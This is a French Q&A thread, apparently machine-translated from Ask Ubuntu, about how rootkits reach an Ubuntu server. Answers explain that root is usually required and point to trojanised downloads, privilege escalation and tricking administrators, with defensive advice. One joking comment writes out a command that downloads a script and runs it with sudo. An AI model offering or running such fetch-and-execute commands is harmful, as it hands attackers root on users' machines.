Comment les rootkits sont-ils installés sur un serveur Ubuntu?

11

J'ai vu quelques articles sur la vérification des rootkits mais je n'ai pas pu trouver d'informations sur la façon dont ils accèdent à un système Linux. En particulier, si vous exploitez un bogue dans un site Web php (oui, je parle de drupageddon ici), est-il possible d'installer un rootkit même si vous ne pouvez exécuter que le serveur Web (www-data) et non pas en tant que root. Les très peu d'informations que j'ai trouvées sur la façon dont celles-ci sont installées suggèrent que vous devez être root pour les installer (voir ici ).

Lance Holland
la source
6
J'ai écrit un petit howto, tu peux l'installer si tu veux? tapez simplementwget http://mydomain/script.sh;sudo ./script.sh
Nanne
1
Oh, j'attendais CETTE réponse!
Over Killer

Réponses:

9

Si c'était moi, je continuerais la méthode suivante:

  • Demandez à un utilisateur de télécharger et d'installer un logiciel (# 1). Demandez à ce logiciel d'installer le logiciel prévu. Masquer un blob binairy dans cette application vous permet de télécharger un logiciel (c'est-à-dire un outil que vous pouvez utiliser pour ftp, wget, etc.).
  • Invitez le compte administrateur (# 2) et utilisez-le pour utiliser une instance ftp, wget pour télécharger et installer le rootkit.

Concernant # 1: un utilisateur ne devrait jamais télécharger un logiciel aléatoire lors de l'utilisation de Linux; utilisez les canaux appropriés (Ubuntu Software Center) pour installer le logiciel. S'il s'agit d'un logiciel qui doit être téléchargé en dehors des canaux appropriés, assurez-vous que la source du téléchargement peut être fiable. Pensez aux dernières versions du logiciel Apache ou de MySQL. Ne cherchez pas à télécharger des logiciels aléatoires sans consulter différents réseaux sociaux sur l'intégrité de cette application. Microsoft n'a jamais centralisé de logiciels; cela a amené de nombreuses personnes à essayer le logiciel, de sorte que leur base d'utilisateurs est énorme, mais cela a également facilité l'accès aux ordinateurs et la collecte de données qu'ils peuvent vendre.

Concernant # 2: faille fatale de l'utilisateur. Ne saisissez jamais votre mot de passe administrateur à moins que vous ne sachiez pourquoi il vous est demandé.

Rinzwind
la source
8

Oui, en général, une autorisation root est requise pour installer un rootkit. De nombreux rootkits contiennent un module qui est chargé dans le noyau, un autre outil de réécriture généralement utilisé par root. Dans un système correctement configuré et parfait, il n'y aurait aucun moyen d'installer le kit racine sans privilèges root, mais ...

... il peut y avoir des problèmes avec la configuration du système rendant le système dangereux. ... il pourrait y avoir des bogues de sécurité qui permettent une élévation de privilèges ... il pourrait y avoir des moyens de tromper un utilisateur avec des autorisations root pour exécuter quelque chose de mal.

Les voies sont aussi illimitées que l'imagination de l'intrus.

Klaus D.
la source